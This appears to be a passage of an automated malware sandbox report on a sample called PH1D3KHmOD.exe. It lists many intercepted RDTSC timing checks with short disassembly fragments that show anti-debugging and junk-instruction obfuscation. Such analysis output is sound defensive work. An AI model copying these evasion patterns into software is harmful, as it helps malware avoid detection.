      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E3E54 second address: 2E3E5A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E3E5A second address: 2E3ED9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8CACB12CB8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jnl 00007F8CACB12CBAh 0x00000016 mov eax, dword ptr [eax] 0x00000018 push esi 0x00000019 push ecx 0x0000001a pushad 0x0000001b popad 0x0000001c pop ecx 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 pushad 0x00000023 jg 00007F8CACB12CBCh 0x00000029 push eax 0x0000002a push edi 0x0000002b pop edi 0x0000002c pop eax 0x0000002d popad 0x0000002e pop eax 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007F8CACB12CB8h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 mov dword ptr [ebp+122D1887h], edx 0x0000004f pushad 0x00000050 or dword ptr [ebp+122D36AFh], eax 0x00000056 mov dword ptr [ebp+122D2B76h], eax 0x0000005c popad 0x0000005d push 05713020h 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F8CACB12CBFh 0x00000069 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E3ED9 second address: 2E3EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CACC719F8h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E4054 second address: 2E4059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E417F second address: 2E4184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E438F second address: 2E4393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E4393 second address: 2E43AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnl 00007F8CACC719E6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E43AA second address: 2E43BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jo 00007F8CACB12CDBh 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F8CACB12CB6h 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E43BF second address: 2E4416 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a and edx, dword ptr [ebp+122D36BEh] 0x00000010 push 00000004h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F8CACC719E8h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F8CACC719EBh 0x00000036 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E4416 second address: 2E441C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E441C second address: 2E442D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8CACC719ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E4766 second address: 2E4770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F8CACB12CB6h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E4B3F second address: 2E4B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, dword ptr [ebp+122D2677h] 0x0000000f lea eax, dword ptr [ebp+1247E540h] 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F8CACC719E8h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f nop 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F8CACC719EFh 0x00000037 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 321075 second address: 32107A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3214CC second address: 3214D6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8CACC719E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3214D6 second address: 3214E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 pop edi 0x00000009 jne 00007F8CACB12CB6h 0x0000000f pop eax 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3214E6 second address: 3214EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3214EC second address: 3214F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 32160E second address: 321635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 jnl 00007F8CACC719E6h 0x0000000e jmp 00007F8CACC719F7h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3249A0 second address: 3249DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F8CACB12CC2h 0x0000000a push edx 0x0000000b jno 00007F8CACB12CB6h 0x00000011 pop edx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007F8CACB12CC9h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3249DE second address: 3249E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 32A283 second address: 32A291 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8CACB12CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 32A291 second address: 32A2A1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8CACC719E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 32A2A1 second address: 32A2A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 328ECE second address: 328EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CACC719EFh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 328EE6 second address: 328EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 328EEA second address: 328EEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 328EEE second address: 328EFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8CACB12CB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 328EFA second address: 328F30 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F8CACC719F5h 0x0000000a pop esi 0x0000000b jnp 00007F8CACC719E8h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 jmp 00007F8CACC719EDh 0x0000001b pop ebx 0x0000001c rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3291DD second address: 3291E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8CACB12CB6h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3291E7 second address: 3291EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3291EB second address: 3291F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 32954E second address: 329552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3296D4 second address: 3296DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3296DE second address: 3296E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3296E3 second address: 329712 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F8CACB12CB6h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F8CACB12CC1h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jg 00007F8CACB12CBCh 0x0000001a jbe 00007F8CACB12CB6h 0x00000020 push edi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3299CF second address: 3299EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CACC719F9h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 329F36 second address: 329F40 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8CACB12CBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 329F40 second address: 329F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 329F48 second address: 329F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 32B87C second address: 32B8A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8CACC719E6h 0x0000000a jno 00007F8CACC719E6h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F8CACC719F5h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3311BF second address: 3311D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F8CACB12CB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F8CACB12CB8h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 32FBF0 second address: 32FC15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CACC719EEh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8CACC719EEh 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 32FC15 second address: 32FC1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 32FF05 second address: 32FF16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CACC719EDh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 33048D second address: 33049A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 33049A second address: 33049E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 330798 second address: 33079C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 33079C second address: 3307A6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8CACC719E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3307A6 second address: 3307C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8CACB12CC9h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 33464F second address: 334660 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8CACC719E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 334660 second address: 33466A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3340D0 second address: 3340D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3340D4 second address: 3340E1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8CACB12CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3340E1 second address: 3340EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F8CACC719E6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 334242 second address: 33424C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 33424C second address: 334263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CACC719F1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 334263 second address: 33426B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 33AD8A second address: 33ADA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8CACC719F3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 33E495 second address: 33E4A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CACB12CBCh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 33E4A5 second address: 33E4C1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8CACC719E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F8CACC719F2h 0x00000010 jl 00007F8CACC719E6h 0x00000016 jng 00007F8CACC719E6h 0x0000001c rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 33DC9F second address: 33DCA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 33DE11 second address: 33DE17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 33DE17 second address: 33DE34 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F8CACB12CC7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 33DF8C second address: 33DF9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jg 00007F8CACC719ECh 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 345440 second address: 345446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 345446 second address: 34545D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8CACC719F2h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34545D second address: 345468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007F8CACB12CB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 345468 second address: 345470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 345470 second address: 345476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 345476 second address: 345482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 345482 second address: 345496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CACB12CBFh 0x00000009 pop edi 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 344017 second address: 344021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8CACC719E6h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 344191 second address: 3441AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F8CACB12CB6h 0x00000013 jmp 00007F8CACB12CBAh 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3441AE second address: 3441B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3441B4 second address: 3441C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jc 00007F8CACB12CBEh 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3442F2 second address: 3442F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3442F6 second address: 344310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F8CACB12CB6h 0x0000000d jmp 00007F8CACB12CBCh 0x00000012 popad 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 344310 second address: 34431C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F8CACC719E6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34461B second address: 344625 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8CACB12CBEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34E3A8 second address: 34E3BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007F8CACC719E6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F8CACC719E6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34E3BF second address: 34E3C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34C5E7 second address: 34C5EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34C5EB second address: 34C5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jp 00007F8CACB12CB6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34CF2E second address: 34CF32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34CF32 second address: 34CF51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8CACB12CC5h 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34CF51 second address: 34CF77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8CACC719ECh 0x0000000b pushad 0x0000000c jmp 00007F8CACC719EBh 0x00000011 jl 00007F8CACC719E6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34D76B second address: 34D78B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 js 00007F8CACB12CC6h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 34D78B second address: 34D78F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
